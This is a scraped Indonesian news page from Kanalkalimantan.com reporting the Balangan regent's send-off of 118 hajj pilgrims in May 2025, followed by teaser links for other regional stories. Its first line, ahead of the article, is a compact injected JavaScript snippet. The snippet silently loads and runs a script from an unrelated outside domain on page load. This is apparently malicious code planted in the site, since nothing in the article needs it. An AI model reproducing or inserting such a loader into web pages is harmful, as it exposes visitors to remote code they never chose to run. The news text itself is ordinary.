(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM, PARINGIN – Bupati Balangan Abdul Hadi melepas 118 orang jemaah haji Kabupaten Balangan yang terdiri dari 54 jemaah laki-laki, 64 jemaah perempuan, dan satu orang Petugas Pendamping Haji Daerah (PPHD) di halaman Masjid Al-Akbar, Paringin Selatan, Jum’at (16/5/2025).
Abdul Hadi berharap agar seluruh jemaah dapat melaksanakan rangkaian ibadah haji dengan lancar dan kembali ke tanah air dalam keadaan sehat.
“Kami mendoakan semoga seluruh calon jemaah senantiasa dalam keadaan sehat walafiat di sana, lancar dalam menjalankan ibadah, dan menjadi haji yang mabrur. Kami juga berharap jemaah dapat kembali ke Banua dalam keadaan sehat,” ujar Bupati Balangan.
Jemaah haji asal Balangan tahun ini tergabung dalam Kelompok Terbang (Kloter) BDJ-07 bersama jemaah dari Kabupaten Tapin dan Kota Banjarbaru.
Baca juga: Wakil Ketua I DPRD Kapuas Dukung Visi “Bersinar” dalam Musrenbang RPJMD 2025-2029
Menurut Abdul Hadi, penggabungan Kloter ini akan memudahkan komunikasi antar jemaah karena masih berada dalam satu Provinsi Kalimantan Selatan.
“Jaga nama baik daerah kita, karena kita akan bergaul dengan kabupaten lain, daerah lain, bahkan bangsa lain,” pesannya.
Ia mengingatkan pentingnya menjaga kondisi fisik selama menjalankan ibadah haji seperti memperhatikan asupan makan dan minum, konsumsi suplemen vitamin serta mengikuti arahan dari para pembimbing.
Selain itu, Abdul Hadi berpesan agar para calon jemaah haji mendoakan kelancaran pembangunan dan keberkahan Kabupaten Balangan di Tanah Suci.
Baca juga: Hakim Ketuk Palu Bebas Syarifah Hayana, JPU Bawa Putusan ke Sentral Gakkumdu
“Kami mohon doakan agar Kabupaten Balangan senantiasa diberi keberkahan oleh Allah SWT, dijauhkan dari bencana, dan diberikan kekuatan agar pembangunan di Balangan dapat berjalan cepat dan mampu mengejar ketertinggalan dari kabupaten kota lain di Kalsel,” pintanya.
Turut hadir dalam pelepasan jemaah haji, Wakil Bupati Balangan H Akhmad Fauzi, Ketua TP PKK Balangan, Ketua GOW Balangan, serta unsur Forkopimda. (Kanalkalimantan.com/mcbalangan)
Reporter: mcbalangan
Editor: kk
KANALKALIMANTAN.COM, BANJARMASIN – Kementerian Hukum (Kemenkum) RI mengapresiasi sarana prasarana (sarpras) di Pos Bantuan Hukum… Read More
KANALKALIMANTAN.COM, JAKARTA - Direktur Lingkar Madani (LIMA) Indonesia, Ray Rangkuti, melontarkan kritik pedas terhadap merosotnya… Read More
KANALKALIMANTAN.COM, PARINGIN – Permintaan pembangunan infrastruktur mendominasi Musyawarah Perencanaan Pembangunan (Musrenbang) Kecamatan Halong yang membahas… Read More
KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota Banjarbaru terus mempercepat transformasi digital dalam tata kelola keuangan daerah.… Read More
KANALKALIMANTAN.COM, BANJARMASIN - Kota Banjarmasin menjadi lokasi kegiatan berbagi 2.500 sepatu ke anak sekolah oleh… Read More
KANALKALIMANTAN.COM, BANJARMASIN - Forum Rakyat Peduli Negara dan Bangsa (Forpeban) Kalimantan Selatan (Kalsel) menggelar unjuk… Read More
This website uses cookies.